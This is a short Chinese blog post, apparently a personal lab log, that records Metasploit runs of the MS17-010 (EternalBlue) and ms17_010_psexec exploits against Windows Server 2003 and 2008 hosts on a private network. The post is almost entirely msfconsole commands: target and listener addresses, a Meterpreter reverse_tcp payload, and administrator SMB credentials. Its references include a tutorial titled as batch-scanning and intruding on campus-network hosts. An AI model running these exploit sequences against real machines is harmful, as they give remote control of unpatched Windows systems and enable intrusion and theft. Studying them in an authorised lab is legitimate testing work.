zoukankan      html  css  js  c++  java
  • MSF MS17_010漏洞测试

    0x00 window 2003 R2 x86

    use  exploit/windows/smb/ms17_010_eternalblue
    show options
    set rhost 192.168.204.133
    set lhost 192.168.204.129
    set payload windows/meterpreter/reverse_tcp
    run

    use exploit/windows/smb/ms17_010_psexec
    set rhost 192.168.204.133
    set lhost 192.168.204.129
    run

     0x01 window 2008 R2 x64

    search ms17_010
    use exploit/windows/smb/ms17_010_eternalblue
    show options
    set rhost 192.168.204.148
    run

    use exploit/windows/smb/ms17_010_psexec
    set rhost 192.168.204.148
    set lhost 192.168.204.129
    set SMBUser administrator
    set SMBPass abc123!
    run

    0x02 window 2008 R2 x86

      ms17_010_eternalblue 测试不成功

    ms17_010_psexec 测试情况如下:
    use exploit/windows/smb/ms17_010_psexec 
    show options
    set rhost 192.168.204.145
    set lhost 192.168.204.129
    set SMBUser administrator
    set SMBPass abc123!
    run

    最后

    欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

     

     参考链接:

    https://blog.csdn.net/u013672940/article/details/78200950/

    那些年,我们追过的“蓝” 

    http://5ecurity.cn/index.php/archives/54/

    实战!利用MSF批量扫描校园网中含有MS17_010漏洞的主机并入侵

    https://paper.tuisec.win/detail/385a86ba9d9c253

  • 相关阅读:
    js中字符串的操作
    javascript中null与undefined的区别
    javascript中=、==与===的区别
    less
    火狐浏览器下点击a标签时出现虚线的解决方案
    js删除数组中重复的元素
    js中的indexOf
    css选择器
    bootstrap-table组合表头
    使用yo -v查看yeoman版本号
  • 原文地址:https://www.cnblogs.com/xiaozi/p/9257107.html
Copyright © 2011-2022 走看看